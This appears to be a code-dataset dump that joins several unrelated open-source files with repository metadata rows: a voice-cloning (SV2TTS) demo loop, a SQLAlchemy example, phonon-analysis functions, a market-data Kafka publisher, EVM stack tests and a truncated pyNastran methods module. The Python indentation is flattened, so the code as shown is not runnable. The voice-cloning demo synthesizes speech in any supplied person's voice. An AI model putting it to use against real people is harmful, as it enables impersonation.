print("\tTesting the synthesizer... (loading the model will output a lot of text)")
mels = synthesizer.synthesize_spectrograms(texts, embeds)
# The vocoder synthesizes one waveform at a time, but it's more efficient for long ones. We
# can concatenate the mel spectrograms to a single one.
mel = np.concatenate(mels, axis=1)
# The vocoder can take a callback function to display the generation. More on that later. For
# now we'll simply hide it like this:
no_action = lambda *args: None
print("\tTesting the vocoder...")
# For the sake of making this test short, we'll pass a short target length. The target length
# is the length of the wav segments that are processed in parallel. E.g. for audio sampled
# at 16000 Hertz, a target length of 8000 means that the target audio will be cut in chunks of
# 0.5 seconds which will all be generated together. The parameters here are absurdly short, and
# that has a detrimental effect on the quality of the audio. The default parameters are
# recommended in general.
vocoder.infer_waveform(mel, target=200, overlap=50, progress_callback=no_action)
print("All test passed! You can now synthesize speech.\n\n")
## Interactive speech generation
print("This is a GUI-less example of interface to SV2TTS. The purpose of this script is to "
"show how you can interface this project easily with your own. See the source code for "
"an explanation of what is happening.\n")
print("Interactive generation loop")
num_generated = 0
while True:
try:
# Get the reference audio filepath
message = "Reference voice: enter an audio filepath of a voice to be cloned (mp3, " \
"wav, m4a, flac, ...):\n"
# Uncomment next line to take path as input on console
# in_fpath = Path(input(message).replace("\"", "").replace("\'", ""))
# Take path as argument
in_fpath = Path(args.path)
if in_fpath.suffix.lower() == ".mp3" and args.no_mp3_support:
print("Can't Use mp3 files please try again:")
continue
## Computing the embedding
# First, we load the wav using the function that the speaker encoder provides. This is
# important: there is preprocessing that must be applied.
# The following two methods are equivalent:
# - Directly load from the filepath:
preprocessed_wav = encoder.preprocess_wav(in_fpath)
# - If the wav is already loaded:
original_wav, sampling_rate = librosa.load(str(in_fpath))
preprocessed_wav = encoder.preprocess_wav(original_wav, sampling_rate)
print("Loaded file succesfully")
# Then we derive the embedding. There are many functions and parameters that the
# speaker encoder interfaces. These are mostly for in-depth research. You will typically
# only use this function (with its default parameters):
embed = encoder.embed_utterance(preprocessed_wav)
print("Created the embedding")
## Generating the spectrogram
# text = input("Write a sentence (+-20 words) to be synthesized:\n")
# Take text input as an argument
text = args.text
# If seed is specified, reset torch seed and force synthesizer reload
if args.seed is not None:
torch.manual_seed(args.seed)
synthesizer = Synthesizer(args.syn_model_fpath)
# The synthesizer works in batch, so you need to put your data in a list or numpy array
texts = [text]
embeds = [embed]
# If you know what the attention layer alignments are, you can retrieve them here by
# passing return_alignments=True
specs = synthesizer.synthesize_spectrograms(texts, embeds)
spec = specs[0]
print("Created the mel spectrogram")
## Generating the waveform
print("Synthesizing the waveform:")
# If seed is specified, reset torch seed and reload vocoder
if args.seed is not None:
torch.manual_seed(args.seed)
vocoder.load_model(args.voc_model_fpath)
# Synthesizing the waveform is fairly straightforward. Remember that the longer the
# spectrogram, the more time-efficient the vocoder.
generated_wav = vocoder.infer_waveform(spec)
## Post-generation
# There's a bug with sounddevice that makes the audio cut one second earlier, so we
# pad it.
generated_wav = np.pad(generated_wav, (0, synthesizer.sample_rate), mode="constant")
# Trim excess silences to compensate for gaps in spectrograms (issue #53)
generated_wav = encoder.preprocess_wav(generated_wav)
# Play the audio (non-blocking)
if not args.no_sound:
try:
sd.stop()
sd.play(generated_wav, synthesizer.sample_rate)
except sd.PortAudioError as e:
print("\nCaught exception: %s" % repr(e))
print("Continuing without audio playback. Suppress this message with the \"--no_sound\" flag.\n")
except:
raise
# Save it on the disk
filename = "demo_output_%02d.wav" % num_generated
print(generated_wav.dtype)
sf.write(filename, generated_wav.astype(np.float32), synthesizer.sample_rate)
num_generated += 1
print("\nSaved output as %s\n\n" % filename)
except Exception as e:
print("Caught exception: %s" % repr(e))
print("Restarting\n")
| 47.928571
| 157
| 0.638731
|
a175b1b8974c5224d8d788d0f726fabb2ee5cddc
| 3,090
|
py
|
Python
|
examples/association/basic_association.py
|
paylogic/sqlalchemy
|
876a487bf06a038efde7d46ce09e253b9247aae5
|
[
"MIT"
] | 2
|
2015-11-07T11:55:45.000Z
|
2017-09-04T07:56:34.000Z
|
examples/association/basic_association.py
|
mitsuhiko/sqlalchemy
|
5a6895471fb6bf9afe9bdf017f1fa2c6246ae303
|
[
"MIT"
] | null | null | null |
examples/association/basic_association.py
|
mitsuhiko/sqlalchemy
|
5a6895471fb6bf9afe9bdf017f1fa2c6246ae303
|
[
"MIT"
] | null | null | null |
"""A basic example of using the association object pattern.
The association object pattern is a form of many-to-many which
associates additional data with each association between parent/child.
The example illustrates an "order", referencing a collection
of "items", with a particular price paid associated with each "item".
"""
from datetime import datetime
from sqlalchemy import (create_engine, MetaData, Table, Column, Integer,
String, DateTime, Float, ForeignKey, and_)
from sqlalchemy.orm import mapper, relationship, Session
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Order(Base):
__tablename__ = 'order'
order_id = Column(Integer, primary_key=True)
customer_name = Column(String(30), nullable=False)
order_date = Column(DateTime, nullable=False, default=datetime.now)  # pass the callable so the default is evaluated per row
order_items = relationship("OrderItem", cascade="all, delete-orphan",
backref='order')
def __init__(self, customer_name):
self.customer_name = customer_name
class Item(Base):
__tablename__ = 'item'
item_id = Column(Integer, primary_key=True)
description = Column(String(30), nullable=False)
price = Column(Float, nullable=False)
def __init__(self, description, price):
self.description = description
self.price = price
def __repr__(self):
return 'Item(%r, %r)' % (
self.description, self.price
)
class OrderItem(Base):
__tablename__ = 'orderitem'
order_id = Column(Integer, ForeignKey('order.order_id'), primary_key=True)
item_id = Column(Integer, ForeignKey('item.item_id'), primary_key=True)
price = Column(Float, nullable=False)
def __init__(self, item, price=None):
self.item = item
self.price = price or item.price
item = relationship(Item, lazy='joined')
if __name__ == '__main__':
engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = Session(engine)
# create catalog
tshirt, mug, hat, crowbar = (
Item('SA T-Shirt', 10.99),
Item('SA Mug', 6.50),
Item('SA Hat', 8.99),
Item('MySQL Crowbar', 16.99)
)
session.add_all([tshirt, mug, hat, crowbar])
session.commit()
# create an order
order = Order('john smith')
# add three OrderItem associations to the Order and save
order.order_items.append(OrderItem(mug))
order.order_items.append(OrderItem(crowbar, 10.99))
order.order_items.append(OrderItem(hat))
session.add(order)
session.commit()
# query the order, print items
order = session.query(Order).filter_by(customer_name='john smith').one()
print([(order_item.item.description, order_item.price)
for order_item in order.order_items])
# print customers who bought 'MySQL Crowbar' on sale
q = session.query(Order).join('order_items', 'item')
q = q.filter(and_(Item.description == 'MySQL Crowbar',
Item.price > OrderItem.price))
print([order.customer_name for order in q])
| 32.526316
| 78
| 0.677023
|
9de5c852b2a84ccea83f0127e99b3af286600088
| 10,671
|
py
|
Python
|
PhononModes/match_modes.py
|
Huaguiyuan/PhononModes
|
71319b8b15f25530e4ef6a2c0789ad94c80f801d
|
[
"MIT"
] | 9
|
2015-02-10T15:18:52.000Z
|
2020-11-19T11:08:31.000Z
|
PhononModes/match_modes.py
|
jeffwdoak/PhononModes
|
71319b8b15f25530e4ef6a2c0789ad94c80f801d
|
[
"MIT"
] | null | null | null |
PhononModes/match_modes.py
|
jeffwdoak/PhononModes
|
71319b8b15f25530e4ef6a2c0789ad94c80f801d
|
[
"MIT"
] | 2
|
2018-07-17T12:16:17.000Z
|
2019-03-19T09:34:39.000Z
|
#!/usr/bin/env python
"""
Set of functions to compare phonon normal modes and frequencies between two
related structures to determine mode overlaps and anharmonic coupling constants.
These functions were used in Doak, Wolverton, Ozolins, Phys. Rev. B, 92, 174306
(2015) to calculate Eq. 13--15.
When running this script, two command-line arguments are required:
1. the path to a directory containing a phonon supercell calculation of the
system at a saddle-point of a double-well mode.
2. the path to a directory containing a phonon supercell calculation of the
system at the bottom of double-well mode.
"""
import sys
import numpy as np
from phononmodes import *
saddledir = str(sys.argv[1])
welldir = str(sys.argv[2])
saddle = PhononModes(saddledir+"/phonons.out", saddledir+"/apos.dat")
well = PhononModes(welldir+"/phonons.out", welldir+"/apos.dat")
def test(i):
"""
Calculate and compare participation ratios of modes with the same index in
two calculations. Prints comparison to screen.
Parameters
----------
i : int
Index of mode for which to calculate participation ratios in both
calculations.
"""
for j in range(well.num_modes):
sp = saddle.participation_ratio(i)
wp = well.participation_ratio(j)
prod = np.dot(saddle.normal_modes[i].flatten(), well.normal_modes[j].flatten())
print(i, j, sp, wp, sp - wp, prod)
def transformation_matrix(saddle, well):
"""
Transformation matrix between two sets of normal mode eigenvectors.
Write each normal mode of structure `saddle` as a linear combination of
normal modes of the structure `well`: saddle_i = sum_j(A_ij*well_j)
Transformation matrix, A_ij, gives the coefficients of this expansion.
Parameters
----------
saddle, well : PhononMode objects
PhononModes for the saddle-point calculation and well-bottom
calculations, respectively.
Returns
-------
A : numpy array
Transformation matrix between modes of saddle and modes of well.
"""
A = np.dot(well.flattened_modes(), saddle.flattened_modes().T)
return A
def D1(omega, omega_prime, sigma, initial_modes, final_modes):
"""
Map frequencies from one structure onto another structure.
From Vinay Hegde (hegdevinayi).
Parameters
----------
omega, omega_prime : float
Phonon frequencies to compare (units of cm**-1)
sigma : float
Tolerance below which to consider two frequencies as being similar.
initial_modes, final_modes : PhononMode objects
PhononModes for the two structures being compared.
Returns
-------
D : float
Overlap between modes with frequencies omega in structure 1 and modes
with frequencies omega_prime in structure 2 (units of Angstroms).
"""
D = 0.0
for i in range(initial_modes.num_modes):
for j in range(final_modes.num_modes):
if np.abs(omega - initial_modes.freqs[i]) < sigma:
if np.abs(omega_prime - final_modes.freqs[j]) < sigma:
D += (np.dot(initial_modes.normal_modes[i].flatten(),
final_modes.normal_modes[j].flatten()
)**2)
return D
def D0(mu, nu, initial, final):
"""
Overlap between two modes in different structures.
Calculates the overlap between mode index mu of structure initial and mode
index nu of structure final.
Parameters
----------
mu, nu : int
Indices of phonon modes in structures `initial` and `final`,
respectively.
initial, final : PhononMode objects
PhononModes for the two structures to be compared.
Returns
-------
D : float
Overlap between modes (units of Angstroms).
"""
D = np.dot(initial.normal_modes[mu].flatten(), final.normal_modes[nu].flatten())**2
return D
def anharmonic_coupling0(well, saddle):
"""
Anharmonic coupling constants between modes of two structures.
Coupling constants are calculated from (Eq. 15 of Doak, PRB, 174306, 2015):
a = (w_w**2 - w_s**2)*2/Pmax**2, Pmax=1
Parameters
----------
well, saddle : PhononMode objects
PhononModes for the two structures to be compared.
Returns
-------
a : numpy array
Anharmonic coupling constants between modes of `well` and `saddle`
(units of cm**-2). len(a) == saddle.num_modes
"""
def square_freqs(freqs):
square = np.zeros_like(freqs)
for i in range(len(freqs)):
if np.abs(freqs[i]) < 1.0:
square[i] = 0.0
elif freqs[i] < 0.0:
square[i] = -(freqs[i]**2)
else:
square[i] = freqs[i]**2
return square
well_freqs_squared = square_freqs(well.freqs)
saddle_freqs_squared = square_freqs(saddle.freqs)
a = np.zeros(saddle.num_modes)
for i in range(saddle.num_modes):
a[i] = (well_freqs_squared[i] - saddle_freqs_squared[i])*2
return a
def anharmonic_coupling1(well, saddle):
"""
Anharmonic coupling constants between modes of two structures with acoustic
modes removed.
Coupling constants are calculated from (Eq. 15 of Doak, PRB, 174306, 2015):
a = (w_w**2 - w_s**2)*2/Pmax**2, Pmax=1
Coupling constants are not calculated for the acoustic modes of the two
structures.
Parameters
----------
well, saddle : PhononMode objects
PhononModes for the two structures to be compared.
Returns
-------
a : numpy array
Anharmonic coupling constants between modes of `well` and `saddle`
(units of cm**-2). len(a) == saddle.num_modes
"""
def square_freqs(freqs):
square = np.zeros(len(freqs)-3)
j = 0
for i in range(len(freqs)):
if np.abs(freqs[i]) < 1.0:
continue
elif freqs[i] < 0.0:
square[j] = -(freqs[i]**2)
j += 1
else:
square[j] = freqs[i]**2
j += 1
return square
well_freqs_squared = square_freqs(well.freqs)
saddle_freqs_squared = square_freqs(saddle.freqs)
a = np.zeros(saddle.num_modes-3)
for i in range(saddle.num_modes-3):
a[i] = (well_freqs_squared[i] - saddle_freqs_squared[i])*2
return a
def whittle_overlap(saddle, well, iter_):
"""
Remove a number of modes with the highest overlap between two structures.
Find and remove the saddle-point and well-bottom modes with the
highest overlap (D0) from the overlap matrix, `iter_` times.
Parameters
----------
saddle, well : PhononMode objects
PhononModes of the two structures to compare.
iter_ : int
Number of modes to identify and remove based on having the highest
overlap between structures.
Returns
-------
overlap : numpy array
Overlap between remaining modes of the two structures (units of
Angstroms).
welltosaddle : numpy array
Array indicating which modes of `saddle` overlap most with modes of
`well`. For each mode in `saddle`, this array contains the index of the
mode in `well` that has the greatest overlap with it, up to `iter_`
modes. If the mode in `saddle` does not have an overlap in the `iter_`
highest overlaps, the value of its index in `welltosaddle` is 0.
len(welltosaddle) == saddle.num_modes
"""
# initial overlap matrix construction
nmodes = saddle.num_modes
saddlefreqs = np.copy(saddle.freqs)
wellfreqs = np.copy(well.freqs)
overlap = [D0(i, j, saddle, well) for i in range(nmodes) for j in range(nmodes)]
overlap = np.reshape(overlap, (nmodes, nmodes))
argoverlap = [[i, j] for i in range(nmodes) for j in range(nmodes)]
argoverlap = np.reshape(argoverlap, (nmodes, nmodes, 2))
welltosaddle = np.zeros(nmodes)
# repeatedly find the maximum overlap and remove those two modes from the
# saddle and well lists
for i in range(iter_):
max = np.max(overlap)
index = np.unravel_index(np.argmax(overlap), np.shape(overlap))
welltosaddle[argoverlap[index[0], index[1], 0]] = int(argoverlap[index[0], index[1], 1])
print(i, max, index, saddlefreqs[index[0]], wellfreqs[index[1]])
overlap = np.delete(overlap, index[0], 0)
overlap = np.delete(overlap, index[1], 1)
argoverlap = np.delete(argoverlap, index[0], 0)
argoverlap = np.delete(argoverlap, index[1], 1)
saddlefreqs = np.delete(saddlefreqs, index[0])
wellfreqs = np.delete(wellfreqs, index[1])
return overlap, welltosaddle
def square_freqs(freqs):
"""
Square phonon frequencies, accounting for imaginary modes.
Squares each phonon frequency. Frequencies of imaginary modes are set to be
negative. Square frequencies of acoustic modes are set to zero.
Parameters
----------
freqs : numpy array
Array of phonon frequencies in cm**-1. Imaginary modes have negative
frequencies.
Returns
-------
square : numpy array
Array of squared frequencies. Imaginary modes have negative square
frequencies.
len(square) == len(freqs)
"""
square = np.zeros_like(freqs)
for i in range(len(freqs)):
if np.abs(freqs[i]) < 1.0:
square[i] = 0.0
elif freqs[i] < 0.0:
square[i] = -(freqs[i]**2)
else:
square[i] = freqs[i]**2
return square
def rotated_freqs(well, saddle):
"""
Squared frequencies of modes of `saddle` acting on system `well`.
Calculate the squared frequencies of the saddle system normal mode
displacements acting on the dynamical matrix of the well system. Equation
14 of Doak, PRB 174306, 2015.
Parameters
----------
well, saddle : PhononMode objects
PhononModes of two structures to compare. Dynamical matrix of `well`
will be used for comparison.
Returns
-------
newfreqs : numpy array
Array of effective square phonon frequencies (units of cm**-2) of modes
of structure `saddle` acting on system `well`.
"""
A = transformation_matrix(saddle, well)
omegasquare = square_freqs(saddle.freqs)
newfreqs = np.zeros_like(well.freqs)
for i in range(len(well.freqs)):
for j in range(len(saddle.freqs)):
newfreqs[i] += omegasquare[j]*A[i, j]**2
newfreqs[i] = np.sqrt(newfreqs[i])
return newfreqs
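# A minimal end-to-end sketch (not part of the original script; `saddle` and `well`
# are the PhononModes objects loaded above): compute the mode transformation matrix,
# anharmonic coupling constants, and rotated frequencies.
#   A = transformation_matrix(saddle, well)
#   a = anharmonic_coupling0(well, saddle)
#   new_freqs = rotated_freqs(well, saddle)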
| 33.242991
| 96
| 0.639022
|
b39aa825baf0fc99f1464458369dd3da00135f45
| 1,721
|
py
|
Python
|
dxfeed/publish_order_table.py
|
hythloda/redpanda-dxfeed-financial-data
|
4d33ba58db7bce79144721ca49ee17ab66181b37
|
[
"Apache-2.0"
] | 3
|
2021-12-14T13:06:41.000Z
|
2022-02-17T19:34:41.000Z
|
dxfeed/publish_order_table.py
|
BenPope/redpanda-dxfeed-financial-data
|
4d33ba58db7bce79144721ca49ee17ab66181b37
|
[
"Apache-2.0"
] | null | null | null |
dxfeed/publish_order_table.py
|
BenPope/redpanda-dxfeed-financial-data
|
4d33ba58db7bce79144721ca49ee17ab66181b37
|
[
"Apache-2.0"
] | 2
|
2021-12-22T18:00:15.000Z
|
2022-01-18T14:36:38.000Z
|
from confluent_kafka import Producer
from datetime import datetime
import dxfeed as dx
import json
import time
import re
# Sleep to ensure server has time to run
time.sleep(3)
producer = Producer({
'bootstrap.servers': 'redpanda:29092',
})
endpoint = dx.Endpoint('demo.dxfeed.com:7300')
symbols = ['SPY', 'AAPL', 'IBM', 'MSFT', 'DIA', 'XLF', 'GOOG', 'AMZN', 'TSLA', 'SPX', 'HPQ', 'CSCO', 'INTC', 'AXP']
types = ['Order']
class Subscriptions(object):
def __init__(self, type):
self.sub = endpoint.create_subscription(type)
self.handler = dx.DefaultHandler()
self.sub.set_event_handler(self.handler)
self.sub = self.sub.add_symbols(symbols)
self.handler = self.sub.get_event_handler()
self.topic_name = type
my_subscriptions = []
for i in range(len(types)):
my_subscriptions.append(Subscriptions(types[i]))
time.sleep(1)
def clean_order(values):
data = {
"Symbol": values[0],
"EventFlags": values[1],
"Index": values[2],
"Timestamp": values[3],
"Sequence": values[4],
"Price": values[5],
"Size": values[6],
"Count": values[7],
"Scope": values[8],
"Side": values[9],
"ExchangeCode": values[10],
"Source": values[11],
"MarketMaker": values[12],
"SpreadSymbol": values[13]
}
producer.produce(topic= 'Order', key=None, value=json.dumps(data))
producer.flush()
while True:
for obj in my_subscriptions:
data = obj.handler.get_dataframe().to_json(orient ='values')
json_dictionary = json.loads(data)
for key in json_dictionary:
if(obj.topic_name == 'Order'):
formatted = clean_order(key)
| 26.075758
| 115
| 0.611854
|
1e818395304c6189ea62a8ff326152cf7c68f3cf
| 3,019
|
py
|
Python
|
tests/core/stack/test_stack.py
|
jin10086/py-evm
|
da04e8de42fdbf3bc5ca596f5f6b3d810c1afea8
|
[
"MIT"
] | 5
|
2018-09-28T20:01:42.000Z
|
2022-02-22T19:54:46.000Z
|
tests/core/stack/test_stack.py
|
jin10086/py-evm
|
da04e8de42fdbf3bc5ca596f5f6b3d810c1afea8
|
[
"MIT"
] | null | null | null |
tests/core/stack/test_stack.py
|
jin10086/py-evm
|
da04e8de42fdbf3bc5ca596f5f6b3d810c1afea8
|
[
"MIT"
] | 2
|
2018-12-09T15:58:11.000Z
|
2020-09-29T07:10:21.000Z
|
import pytest
from eth_utils import (
ValidationError,
)
from eth.vm.stack import (
Stack,
)
from eth.exceptions import (
FullStack,
InsufficientStack,
)
from eth.constants import (
UINT256,
BYTES,
SECPK1_N,
)
@pytest.fixture
def stack():
return Stack()
@pytest.mark.parametrize(
("value,is_valid"),
(
(-1, False),
(0, True),
(1, True),
(2**256 - 1, True),
(2**256, False),
('abcde', False),
(b'abcde', True),
(b'100100100100100100100100100100100', False),
)
)
def test_push_only_pushes_valid_stack_items(stack, value, is_valid):
if is_valid:
stack.push(value)
assert stack.values == [value]
else:
with pytest.raises(ValidationError):
stack.push(value)
def test_push_does_not_allow_stack_to_exceed_1024_items(stack):
for num in range(1024):
stack.push(num)
assert len(stack.values) == 1024
with pytest.raises(FullStack):
stack.push(1025)
def test_dup_does_not_allow_stack_to_exceed_1024_items(stack):
stack.push(1)
for num in range(1023):
stack.dup(1)
assert len(stack.values) == 1024
with pytest.raises(FullStack):
stack.dup(1)
@pytest.mark.parametrize(
("items,type_hint"),
(
([1], UINT256),
([1, 2, 3], UINT256),
([b'1', b'10', b'101', b'1010'], BYTES)
)
)
def test_pop_returns_latest_stack_item(stack, items, type_hint):
for each in items:
stack.push(each)
assert stack.pop(num_items=1, type_hint=type_hint) == items[-1]
@pytest.mark.parametrize(
("value,type_hint,type,is_valid"),
(
(1, UINT256, int, True),
(b'101', BYTES, bytes, True),
(1, SECPK1_N, int, False)
)
)
def test_pop_typecasts_correctly_based_off_type_hint(stack, value, type_hint, type, is_valid):
stack.push(value)
if is_valid:
assert isinstance(stack.pop(num_items=1, type_hint=type_hint), type)
else:
with pytest.raises(TypeError):
stack.pop(type_hint=type_hint)
def test_swap_operates_correctly(stack):
for num in range(5):
stack.push(num)
assert stack.values == [0, 1, 2, 3, 4]
stack.swap(3)
assert stack.values == [0, 4, 2, 3, 1]
stack.swap(1)
assert stack.values == [0, 4, 2, 1, 3]
def test_dup_operates_correctly(stack):
for num in range(5):
stack.push(num)
assert stack.values == [0, 1, 2, 3, 4]
stack.dup(1)
assert stack.values == [0, 1, 2, 3, 4, 4]
stack.dup(5)
assert stack.values == [0, 1, 2, 3, 4, 4, 1]
def test_pop_raises_InsufficientStack_appropriately(stack):
with pytest.raises(InsufficientStack):
stack.pop(num_items=1, type_hint=UINT256)
def test_swap_raises_InsufficientStack_appropriately(stack):
with pytest.raises(InsufficientStack):
stack.swap(0)
def test_dup_raises_InsufficientStack_appropriately(stack):
with pytest.raises(InsufficientStack):
stack.dup(0)
| 23.403101
| 94
| 0.632329
|
ad4857be3cd7c63e0f8166b9b7e168f046a93770
| 41,916
|
py
|
Python
|
pyNastran/bdf/cards/methods.py
|
SteveDoyle2/pyNastran
|
399a63447517829f665e58487cdcae326447ce36
|
[
"BSD-3-Clause"
] | 293
|
2015-03-22T20:22:01.000Z
|
2022-03-14T20:28:24.000Z
|
pyNastran/bdf/cards/methods.py
|
sean-engelstad/pyNastran
|
90f957887a4f68f8e58b07c15e1ac69c66b9c6f4
|
[
"BSD-3-Clause"
] | 512
|
2015-03-14T18:39:27.000Z
|
2022-03-31T16:15:43.000Z
|
pyNastran/bdf/cards/methods.py
|
sean-engelstad/pyNastran
|
90f957887a4f68f8e58b07c15e1ac69c66b9c6f4
|
[
"BSD-3-Clause"
] | 136
|
2015-03-19T03:26:06.000Z
|
2022-03-25T22:14:54.000Z
|
# pylint: disable=C0103,R0902,R0904,R0914
"""
All method cards are defined in this file. This includes:
* EIGB
* EIGC
* EIGR
* EIGP
* EIGRL
All cards are Method objects.
"""
from __future__ import annotations
from typing import TYPE_CHECKING, Any, List
from pyNastran.bdf.field_writer_8 import set_blank_if_default
from pyNastran.bdf.cards.base_card import BaseCard
from pyNastran.bdf.bdf_interface.assign_type import (
integer, integer_or_blank, double, double_or_blank, string, string_or_blank,
parse_components, components_or_blank, integer_double_string_or_blank, blank,
interpret_value)
from pyNastran.bdf.field_writer_8 import print_card_8
from pyNastran.bdf.field_writer_16 import print_card_16
if TYPE_CHECKING: # pragma: no cover
from pyNastran.bdf.bdf import BDF
class Method(BaseCard):
"""
Generic class for all methods.
Part of self.methods
"""
def __init__(self):
pass
class EIGB(Method):
"""Defines data needed to perform buckling analysis"""
type = 'EIGB'
@classmethod
def _init_from_empty(cls):
sid = 1
method = 'INV'
G = 1
C = 1
norm = 'MAX'
L1 = 1.0
L2 = 2.0
nep = 10
ndp = 20
ndn = 30
return EIGB(sid, method, L1, L2, nep, ndp, ndn, norm, G, C, comment='')
def __init__(self, sid, method, L1, L2, nep, ndp, ndn, norm, G, C, comment=''):
Method.__init__(self)
if comment:
self.comment = comment
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: Method of eigenvalue extraction. (Character: 'INV' for inverse
#: power method or 'SINV' for enhanced inverse power method.)
#: apparently it can also be blank...
self.method = method
#: Eigenvalue range of interest. (Real, L1 < L2)
self.L1 = L1
self.L2 = L2
#: Estimate of number of roots in positive range not used for
#: METHOD = 'SINV'. (Integer > 0)
self.nep = nep
#: Desired number of positive and negative roots.
#: (Integer>0; Default = 3*NEP)
self.ndp = ndp
self.ndn = ndn
#: Method for normalizing eigenvectors.
#: ('MAX' or 'POINT';Default='MAX')
self.norm = norm
self.G = G
self.C = C
if not self.L1 < self.L2:
msg = 'L1=%s L2=%s; L1<L2 is required' % (self.L1, self.L2)
raise RuntimeError(msg)
if self.method not in ['INV', 'SINV', None]:
msg = 'method must be INV or SINV. method=%r' % self.method
raise RuntimeError(msg)
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGB card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
method = string_or_blank(card, 2, 'method')
L1 = double(card, 3, 'L1')
L2 = double(card, 4, 'L2')
nep = integer_or_blank(card, 5, 'nep', 0)
ndp = integer_or_blank(card, 6, 'ndp', 3 * nep)
ndn = integer_or_blank(card, 7, 'ndn', 3 * nep)
norm = string_or_blank(card, 9, 'norm', 'MAX')
if norm == 'POINT':
G = integer(card, 10, 'G')
C = parse_components(card, 11, 'C', None)
else:
G = integer_or_blank(card, 10, 'G')
C = components_or_blank(card, 11, 'C', None)
assert len(card) <= 12, f'len(EIGB card) = {len(card):d}\ncard={card}'
return EIGB(sid, method, L1, L2, nep, ndp, ndn, norm, G, C,
comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
def raw_fields(self):
list_fields = ['EIGB', self.sid, self.method, self.L1, self.L2, self.nep,
self.ndp, self.ndn, None, self.norm, self.G, self.C]
return list_fields
def repr_fields(self):
#method = set_blank_if_default(self.method,'INV')
nep = set_blank_if_default(self.nep, 0)
ndp = set_blank_if_default(self.ndp, 3 * self.nep)
ndn = set_blank_if_default(self.ndn, 3 * self.nep)
norm = set_blank_if_default(self.norm, 'MAX')
list_fields = ['EIGB', self.sid, self.method, self.L1, self.L2, nep, ndp,
ndn, None, norm, self.G, self.C]
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
class EIGC(Method):
"""
Defines data needed to perform complex eigenvalue analysis
.. todo: not done
``inverse power``
+------+---------+---------+---------+---------+---------+---------+-----+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+======+=========+=========+=========+=========+=========+=========+=====+
| EIGC | SID | METHOD | | | | EPS | ND0 |
+------+---------+---------+---------+---------+---------+---------+-----+
| | ALPHAAj | OMEGAAj | ALPHABj | OMEGABj | Lj | NEj | NDj |
+------+---------+---------+---------+---------+---------+---------+-----+
``complex Lanczos``
+------+---------+---------+---------+---------+---------+---------+-----+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+======+=========+=========+=========+=========+=========+=========+=====+
| | SHIFTRj | SHIFTIj | MBLKSZj | IBLKSZj | KSTEPSj | NDj | |
+------+---------+---------+---------+---------+---------+---------+-----+
``iterative Schur-Rayleigh-Ritz``
+------+---------+---------+---------+---------+---------+---------+-----+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+======+=========+=========+=========+=========+=========+=========+=====+
| | SHIFTR1 | SHIFTI1 | | | | ISRRFLG | ND1 |
+------+---------+---------+---------+---------+---------+---------+-----+
"""
type = 'EIGC'
@classmethod
def _init_from_empty(cls):
sid = 1
method = 'CLAN'
grid = 1
component = 1
epsilon = 0.1
neigenvalues = 10
return EIGC(sid, method, grid, component, epsilon, neigenvalues,
norm='MAX', mblkszs=None, iblkszs=None, ksteps=None,
NJIs=None, alphaAjs=None, omegaAjs=None, alphaBjs=None,
omegaBjs=None, LJs=None, NEJs=None, NDJs=None,
shift_r1=None, shift_i1=None, isrr_flag=None, nd1=None, comment='')
def __init__(self, sid, method, grid, component, epsilon, neigenvalues,
norm='MAX', # common
mblkszs=None, iblkszs=None, ksteps=None, NJIs=None, # CLAN
alphaAjs=None, omegaAjs=None, alphaBjs=None, omegaBjs=None, # HESS/INV
LJs=None, NEJs=None, NDJs=None, # HESS/INV
shift_r1=None, shift_i1=None, isrr_flag=None, nd1=None, # ISRR
comment=''):
"""
Creates a EIGC card, which is required for a SOL 107 analysis
Parameters
----------
sid : int
CMETHOD id in the case control deck
method : str
Method of complex eigenvalue extraction
MSC 2014 = [INV, HESS, CLAN, IRAM]
NX 8.5 = [INV, HESS, CLAN, ISRR]
Autodesk 2015 = [ARNO, HESS, CLAN]
INV : Inverse Power
IRAM : Implicitly Restarted Arnoldi method
ISRR : Iterative Schur-Rayleigh-Ritz method
CLAN : Complex Lanczos. For linear perturbation of ANALYSIS=DCEIG
with large displacement, CLAN is recommended.
HESS : Upper Hessenberg. For linear perturbation of ANALYSIS=DCEIG
with large displacement, please don't use HESS.
ARNO: ???
norm : str; default='MAX'
Method for normalizing eigenvectors
valid_norm = {MAX, POINT}
grid : int
GRID/SPOINT id
Required if norm='POINT'
component : int
Required if norm='POINT'
epsilon : float
neigenvalues : int
Number of Eigenvalues
mblkszs : List[float]; default=None
used by CLAN
iblkszs : List[int]; default=None
used by CLAN
ksteps : List[int]; default=None
used by CLAN
NJIs : List[int]; default=None
used by CLAN
alphaAjs : List[float]; default=None
used by HESS/INV
omegaAjs : List[float]; default=None
used by HESS/INV
alphaBjs : List[float]; default=None
used by HESS/INV
omegaBjs : List[float]; default=None
used by HESS/INV
LJs : List[float]; default=None
used by HESS/INV
NEJs : List[int]; default=None
used by HESS/INV
NDJs : List[int]; default=None
used by HESS/INV
shift_r1 : List[float]; default=None
used by ISSR
shift_i1 : List[float]; default=None
used by ISSR
isrr_flag : List[int]; default=None
used by ISSR
nd1 : List[int]; default=None
used by ISSR
comment : str; default=''
a comment for the card
"""
Method.__init__(self)
if comment:
self.comment = comment
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: Method of complex eigenvalue extraction
#: MSC 2014 = [INV, HESS, CLAN, IRAM]
#: NX 8.5 = [INV, HESS, CLAN, ISRR]
#: Autodesk 2015 = [ARNO, HESS, CLAN]
self.method = method
#: Method for normalizing eigenvectors
self.norm = norm
#: Grid or scalar point identification number. Required only if
#: NORM='POINT'. (Integer>0)
self.G = grid
#: Component number. Required only if NORM='POINT' and G is a
#: geometric grid point. (1<Integer<6)
self.C = component
#: Convergence criterion. (Real > 0.0. Default values are:
#: 10^-4 for METHOD = "INV",
#: 10^-8 for METHOD = "CLAN",
#: 10^-8 for METHOD = "ISRR",
#: 10^-15 for METHOD = "HESS",
#: E is machine dependent for METHOD = "CLAN".)
